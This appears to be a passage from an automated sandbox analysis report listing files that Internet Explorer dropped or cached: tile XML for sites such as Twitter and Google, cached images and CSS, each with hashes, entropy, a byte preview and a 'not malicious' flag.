                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3072:gZ/2Bfcdmu5kgTzGtPZ/2Bfc+mu5kgTzGtLZ/2Bfcdmu5kgTzGt6Z/2Bfc+mu5kT:Zolxi
                                                                                                                                                                                                                                                                  MD5:3512BA388486E029453976C72F5D022F
                                                                                                                                                                                                                                                                  SHA1:43275E144DDD4F7135422CF95A6DFC0EED62C3B0
                                                                                                                                                                                                                                                                  SHA-256:BE67CAC7271D2525E24651715190802B806C80FA091437A28E691EEFB0C85A00
                                                                                                                                                                                                                                                                  SHA-512:38988A7B93FD75252DC4FFB963BAF36BCFC5FED8E1111E0EAAD627618B5594EF684684B830DB65A27D18DB4BBF72ECD31D738EE1862CDAA44D2E86A13D164F63
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8ED51768-C4CE-11EB-90E5-ECF4BB2D2496}.dat
                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):19032
                                                                                                                                                                                                                                                                  Entropy (8bit):1.5859989006114965
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:IwKGcprrGwpayG4pQPGrapbSEGQpKPWG7HpR5TGIpX2GGApm:ruZlQC6TBScAPBT/Fdg
                                                                                                                                                                                                                                                                  MD5:7575400F2CC52526FF7881DCF9780AE4
                                                                                                                                                                                                                                                                  SHA1:3A809D260547ACBDD42D48AB33F95351F9082626
                                                                                                                                                                                                                                                                  SHA-256:1FF78F43FFBED23DEAFB91C305A3308DA0BF4591F2084E4F0DC1AF8E79093032
                                                                                                                                                                                                                                                                  SHA-512:ADC928A4C717C0BB6313C772C543B6F722F632C55D901B79559AD618112DAAE44DCCC0966A15AD1B86FA9F5F6762D0D548189C8B5DE011E5963B1D2139485F2E
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):659
                                                                                                                                                                                                                                                                  Entropy (8bit):5.07656552536801
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:TMHdNMNxOErC+JoC+JAnWimI002EtM3MHdNMNxOErC+JoC+JAnWimI00OVbVbkEs:2d6NxOx+1+KSZHKd6NxOx+1+KSZ7V6b
                                                                                                                                                                                                                                                                  MD5:26AAA432EE06BBB6A6AE5CCC838FA2DE
                                                                                                                                                                                                                                                                  SHA1:44F2874E0469ABF36FE2978554A4EB37C824F161
                                                                                                                                                                                                                                                                  SHA-256:24DD5DFC9F9C04702A7CD1B9650887DC0E78883CA270BD30A46AA1A0C3A3DA9F
                                                                                                                                                                                                                                                                  SHA-512:640EADE11451C3D3E6E73DF2DBB6B11496CBD94FF61C2D549C6FE56745827A4D2AF910DBEBE5F93A9DAD1723331722069A7FEC125E392AE9FA8EBC36764FCA93
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6056a73d,0x01d758db</date><accdate>0x6056a73d,0x01d758db</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6056a73d,0x01d758db</date><accdate>0x6056a73d,0x01d758db</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):656
                                                                                                                                                                                                                                                                  Entropy (8bit):5.150329914433684
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:TMHdNMNxe2kkXI7XIAnWimI002EtM3MHdNMNxe2kkXI7XIAnWimI00OVbkak6Ety:2d6NxrkSZHKd6NxrkSZ7VAa7b
                                                                                                                                                                                                                                                                  MD5:1628518A298BBBC6C3508F7653AD9779
                                                                                                                                                                                                                                                                  SHA1:03F7E70CE84D5EA066D02DBA80E30DD7231C3810
                                                                                                                                                                                                                                                                  SHA-256:41E5FA2E89DB23DF4EE205BC4FD2663E1BA74ABD1F557C63ED2F147936A34022
                                                                                                                                                                                                                                                                  SHA-512:EE2371A048FF98CA58B71E2B48C388F31C53CC02BDB1EB31C41649C610677BEFF9288676DFC670AE72646233611767869AB05177D709F0C67828B2B9BACABB3D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x60413228,0x01d758db</date><accdate>0x60413228,0x01d758db</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x60413228,0x01d758db</date><accdate>0x60413228,0x01d758db</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):665
                                                                                                                                                                                                                                                                  Entropy (8bit):5.093598028078685
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:TMHdNMNxvLrC+JoC+JAnWimI002EtM3MHdNMNxvLrC+JoC+JAnWimI00OVbmZEty:2d6NxvC+1+KSZHKd6NxvC+1+KSZ7Vmb
                                                                                                                                                                                                                                                                  MD5:F785D79E642B753952CA19537596A5F3
                                                                                                                                                                                                                                                                  SHA1:7DB19F3BDF710455C258B8AF0945228DA21FC94C
                                                                                                                                                                                                                                                                  SHA-256:F4E06D88C2F197F6F8FC54B200010732F240BFADA2FCF7B7E324E91A1146CBCB
                                                                                                                                                                                                                                                                  SHA-512:1CF5109C291EDC0EF2B99F19E08E7065055401B762555F8377DD340B7BC43FAC8C4011E658F4985573B3142BA67382D8CE783FFB80155D053472962E6C8B1F93
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x6056a73d,0x01d758db</date><accdate>0x6056a73d,0x01d758db</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x6056a73d,0x01d758db</date><accdate>0x6056a73d,0x01d758db</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):650
                                                                                                                                                                                                                                                                  Entropy (8bit):5.100852604826119
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:TMHdNMNxiYnAnWimI002EtM3MHdNMNxiYnAnWimI00OVbd5EtMb:2d6NxkSZHKd6NxkSZ7VJjb
                                                                                                                                                                                                                                                                  MD5:B7D49AC8FEA3A40C6A2D1D5C95AEB62C
                                                                                                                                                                                                                                                                  SHA1:CD5262FCEAC6F8C0D4D2B4AA0546FEEC34CB3DB3
                                                                                                                                                                                                                                                                  SHA-256:D5B541B8452926B3E2C1E19DEF518CAD1E20393774D12C74914C5D6B7004869C
                                                                                                                                                                                                                                                                  SHA-512:16E7D19D0933BEEE0E3B2AD18DF2D846BFBB3B546CBDAEB2673D3C6F8C1AC8F891404226A928D6BB7E6749440FD9A59D99D32A3A4B8EAF0643E7A0267E9C2F61
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x604f806c,0x01d758db</date><accdate>0x604f806c,0x01d758db</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x604f806c,0x01d758db</date><accdate>0x604f806c,0x01d758db</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):659
                                                                                                                                                                                                                                                                  Entropy (8bit):5.107729851034181
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:TMHdNMNxhGwrC+JoC+JAnWimI002EtM3MHdNMNxhGwrC+JoC+JAnWimI00OVb8KG:2d6NxQl+1+KSZHKd6NxQl+1+KSZ7VYKG
                                                                                                                                                                                                                                                                  MD5:8C78E1012A6A954E4B56BEBC41B575FA
                                                                                                                                                                                                                                                                  SHA1:2F54938F0F119D5D29B03047F36DDEAF5C15590E
                                                                                                                                                                                                                                                                  SHA-256:A5431FD7B8796AEDCD0E5C39B8308458D7DC48A34649ED8FB977794A27D85180
                                                                                                                                                                                                                                                                  SHA-512:B18807FF020B596D658BE9158C32D5E3D8F0D12D3D7AB54C1FFD104FD09885C5155E45FFE82A3957111758A1A1DE919A28C5CC1C4B087AD26B446A6B3D8BD158
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6056a73d,0x01d758db</date><accdate>0x6056a73d,0x01d758db</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6056a73d,0x01d758db</date><accdate>0x6056a73d,0x01d758db</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):656
                                                                                                                                                                                                                                                                  Entropy (8bit):5.0756278081434045
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:TMHdNMNx0nrC+JoC+JAnWimI002EtM3MHdNMNx0nrC+JoC+JAnWimI00OVbxEtMb:2d6Nx0m+1+KSZHKd6Nx0m+1+KSZ7Vnb
                                                                                                                                                                                                                                                                  MD5:B2DEFB984EB291AFCE065F6620E6A003
                                                                                                                                                                                                                                                                  SHA1:A5EB48CAC819E418993020414767461AFAAEA1E2
                                                                                                                                                                                                                                                                  SHA-256:AD6EA98A4EC29AA3C503F906C211E5F007A40F3A0E6157AEF0685F328B145D30
                                                                                                                                                                                                                                                                  SHA-512:1232AA9FBD4549E7CBCBB50F9983972011C17E48E1B189CD983007618628744506BD506888F5BDA79E9F5F3D838B3C85E7F78C45712B67CA2657474299817474
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x6056a73d,0x01d758db</date><accdate>0x6056a73d,0x01d758db</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x6056a73d,0x01d758db</date><accdate>0x6056a73d,0x01d758db</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):659
                                                                                                                                                                                                                                                                  Entropy (8bit):5.127207758496188
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:TMHdNMNxxYnAnWimI002EtM3MHdNMNxxYoC+JAnWimI00OVb6Kq5EtMb:2d6NxxSZHKd6Nxa+KSZ7Vob
                                                                                                                                                                                                                                                                  MD5:6E2083D843CD8E5DE6B4D9D0D7480AD1
                                                                                                                                                                                                                                                                  SHA1:F26A3D41E6AA515EBB2FE8D406D2E4E12714A9FB
                                                                                                                                                                                                                                                                  SHA-256:0A8F42592C8548D12EDFA3FA9592A0F4BBB5AC480AF544EF6BAC46171F8021B2
                                                                                                                                                                                                                                                                  SHA-512:C6338FA95BF737C699442CE837CEAF9B189F059477264E085C9C5F239EAAEBAF5FFEACF0FA31BCF5F305342CCBC42E9D4FB68F5BEFCD027540EEF3B566104658
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x604f806c,0x01d758db</date><accdate>0x604f806c,0x01d758db</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x604f806c,0x01d758db</date><accdate>0x6056a73d,0x01d758db</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):662
                                                                                                                                                                                                                                                                  Entropy (8bit):5.140064127228762
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:TMHdNMNxcAmnmAnWimI002EtM3MHdNMNxcAmnmAnWimI00OVbVEtMb:2d6NxgSZHKd6NxgSZ7VDb
                                                                                                                                                                                                                                                                  MD5:64B05498896B0731063868A86E026709
                                                                                                                                                                                                                                                                  SHA1:D71F3DC5EDA17EAD60A9A55E03FC267AF8A298F6
                                                                                                                                                                                                                                                                  SHA-256:7080AEB7AF7E7A4CE6BC70AE7A973111DD9E0DBE384A0D334083D11CF356516E
                                                                                                                                                                                                                                                                  SHA-512:2FCCE122E9EB9CDF1D5AF0E2B8C2F713BFC8D354E4C8533C9995037351D8A0F0C435F925E5B954BF8B2C4BE650BB4191A18118F2377B2B9B5327700FB30EC9DB
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x60485935,0x01d758db</date><accdate>0x60485935,0x01d758db</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x60485935,0x01d758db</date><accdate>0x60485935,0x01d758db</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):656
                                                                                                                                                                                                                                                                  Entropy (8bit):5.122964265820333
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:TMHdNMNxfnAmnmAnWimI002EtM3MHdNMNxfnAmnmAnWimI00OVbe5EtMb:2d6NxdSZHKd6NxdSZ7Vijb
                                                                                                                                                                                                                                                                  MD5:A6555D948CD6803EF8364321041E4E4D
                                                                                                                                                                                                                                                                  SHA1:49DC096EDF0F9C7DB4FE9108EB22B0F69459766B
                                                                                                                                                                                                                                                                  SHA-256:46EA3EFFCEC674E0E219F4CA3B8C7400B2B55EB2FC2947C22D1DAEC924D33444
                                                                                                                                                                                                                                                                  SHA-512:3D69E165A0E4ABF63948CE8FDB937DFA9B59EA62229E9737096A01B950014C5DFE5FCC3894DC6F613CB4481EBBBA0B293BCB07C5C727D92BA2366DF011358A1F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x60485935,0x01d758db</date><accdate>0x60485935,0x01d758db</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x60485935,0x01d758db</date><accdate>0x60485935,0x01d758db</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\wlm7n14\imagestore.dat
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):934
                                                                                                                                                                                                                                                                  Entropy (8bit):7.030536266909089
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:u6tWaF/6easyD/iCHLSWWqyCoTTdTc+yhaX4b9upGi:u6tWu/6symC+PTCq5TcBUX4bY
                                                                                                                                                                                                                                                                  MD5:7FB21B544A4B59E64FBB8CBD3ADF29EE
                                                                                                                                                                                                                                                                  SHA1:8230811553C371ADD16CE39185A02166332A83C1
                                                                                                                                                                                                                                                                  SHA-256:9ADBFA24777B9E746D11F2C6234C447E38681406137537F30954D0B41FBE49C6
                                                                                                                                                                                                                                                                  SHA-512:5CF450730C618CEF90C46E1FC22C367D53504CDF2B46C0D6B122940F336B5E69C421AE82B8C23FD601F7EF7E04E1963F3276CC6F5DAB890EA136D66611CE7334
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview: E.h.t.t.p.s.:././.s.t.a.t.i.c.-.g.l.o.b.a.l.-.s.-.m.s.n.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.h.p.-.n.e.u./.s.c./.2.b./.a.5.e.a.2.1...i.c.o......PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D.*.M.*.............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`. ... ...........Ox.`....Ox.`....
                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\1621866888276-3950[1].jpg
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):123646
                                                                                                                                                                                                                                                                  Entropy (8bit):7.967002386589922
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3072:KBT4I5pVA69/+dyecvuuU7RHelbhBa2hdAMJn0sR:EVp9/+8ecGuUZedLaM
                                                                                                                                                                                                                                                                  MD5:CB316CF321F23E959AE5DF736A25BF6D
                                                                                                                                                                                                                                                                  SHA1:9AE070AC4D874E54D43B6A0CFA4BFD8ED474A141
                                                                                                                                                                                                                                                                  SHA-256:F5BEB28EC2B3F767300C61B45EF2F346264A24B9E6C9A00F10E8CABB88EBDB1D
                                                                                                                                                                                                                                                                  SHA-512:4978A375FB0236C913129BEB020C63BFFA2A2598659C30355E5BF8ADB6A8B9A6C794FB1AB8246ADD5BDF7AED92F49351E2B29393019D2E181905867516147254
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  IE Cache URL:https://s.yimg.com/lo/api/res/1.2/aVNxixsHCCRODLS9rj7F0g--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1pbmk7cT0xMDA-/https://s.yimg.com/av/ads/1621866888276-3950.jpg
                                                                                                                                                                                                                                                                  Preview: ......JFIF.............C....................................................................C.......................................................................p.n..............................................C............................!...1..AQ."a#2q..$B..........%&.3RSr....................................D.........................!.1."AQ..aq2...#B....R..$3br...C4.%Sc.D..............?....).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).).+O8.?..c.s..n.[R..l[..Q2..u%.5....Mj..T..;g..z;pI...-D.6D....f...a.0.p..<....q..R...d..o........~.59.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.S.V.+NS......z}X...%X..<g.V.)N)N)N)N)N)N)Q.uv.W.y.....<.v}.e.Z../_.....o......Y..q.S....OA!.*.O..T.....S.j...&<...DM.HQx1..#...x....lW..!..:..:...4.V....
                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\2d-0e97d4-185735b[1].css
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                  File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):249857
                                                                                                                                                                                                                                                                  Entropy (8bit):5.295039902555087
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3072:jaPMUzTAHEkm8OUdvUvOZkru/rpjp4tQH:ja0UzTAHLOUdv1Zkru/rpjp4tQH
                                                                                                                                                                                                                                                                  MD5:B16073A9EC93B3B478EC2D5305BAB0E8
                                                                                                                                                                                                                                                                  SHA1:446E73EF46D83EE7BE6AFC3F7707D409DFE3FFF3
                                                                                                                                                                                                                                                                  SHA-256:6561EBD5D1938217C45AD793DA4DCF4772B5B6E339C2B4A1086AB273EBB0865A
                                                                                                                                                                                                                                                                  SHA-512:19B2F38AF4AD3DB28F1823D94928DEABEF5FC5D1B61EF7E4DAE5E242ADB7403C0BE7F30BFAF07A259DB31C35ED9A9A043928FB3655F47D9C063B38E5C3FD9CEF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview: @charset "UTF-8";div.adcontainer iframe[width='1']{display:none}span.nativead{font-weight:600;font-size:1.1rem;line-height:1.364}div:not(.ip) span.nativead{color:#333}.todaymodule .smalla span.nativead,.todaystripe .smalla span.nativead{bottom:2rem;display:block;position:absolute}.todaymodule .smalla a.nativead .title,.todaystripe .smalla a.nativead .title{max-height:4.7rem}.todaymodule .smalla a.nativead .caption,.todaystripe .smalla a.nativead .caption{padding:0;position:relative;margin-left:11.2rem}.todaymodule .mediuma span.nativead,.todaystripe .mediuma span.nativead{bottom:1.3rem}.ip a.nativead span:not(.title):not(.adslabel),.mip a.nativead span:not(.title):not(.adslabel){display:block;vertical-align:top;color:#a0a0a0}.ip a.nativead .caption span.nativead,.mip a.nativead .caption span.nativead{display:block;margin:.9rem 0 .1rem}.ip a.nativead .caption span.sourcename,.mip a.nativead .caption span.sourcename{margin:.5rem 0 .1rem;max-width:100%}.todaymodule.mediuminfopanehero .ip_
                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\AAKAE0g[1].jpg
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):9865
                                                                                                                                                                                                                                                                  Entropy (8bit):7.945114695308577
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:QorlKTaVd4gGQqxBfqcBAcN1MCJhdUvl7JUDQPE8E507Y3:brxVdGjxdBV3dfewQsjMk
                                                                                                                                                                                                                                                                  MD5:52109A817CFBF6DEE564EB71BB4294A5
                                                                                                                                                                                                                                                                  SHA1:DF141CA658E4D91334491874E66229FA82573C22
                                                                                                                                                                                                                                                                  SHA-256:9C6F3F95A3F75664C3779C7F020B1CCCD56B21764208236CF3C320EAAAE2667B
                                                                                                                                                                                                                                                                  SHA-512:3D7365EFD1C7D779AB5B2955012E7D4AAFF2B2F260C0C41C75F9911B180B2C384FE32EE67DCC8019027A699E8A4BCF4E6292A60FA90F6419482C7BE96DDD0C60
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAKAE0g.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg&x=520&y=248
